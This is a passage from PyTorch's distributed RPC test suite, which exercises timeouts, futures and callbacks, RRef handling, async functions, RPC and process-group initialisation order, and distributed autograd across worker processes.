dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
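    # Event used by timed_out_rpc() to block until a test explicitly unblocks it;
    # it is (re)initialized per process inside the tests below.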
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
        # Test that if a function does not exist on a callee, we don't crash;
        # instead, we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
            # Use delattr to remove the binding of the func on this node.
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
AttributeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
        # Create a reference cycle so that Python does not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Add a 'then' callback that runs afterwards to guarantee that we wait for the first callback.
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
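# Helper shared by the future tests below: runs `func` on dst1 with dst2 as the
# nested target and checks the summed result.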
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
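# Dispatch helper that invokes `fn` on `to` via rpc_sync, rpc_async, or remote,
# depending on `mode`.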
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
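# Exercises the async methods of AsyncExecutionClass through the RRef proxies
# (rpc_sync(), rpc_async(), remote()) on an instance owned by dst1.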
def _test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
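# Returning a bare torch.futures.Future from an RPC is expected to fail,
# since Futures cannot be pickled.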
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
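# Verify that init_rpc validates the types of its `backend` and
# `rpc_backend_options` arguments.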
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with torch.autograd.profiler.profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
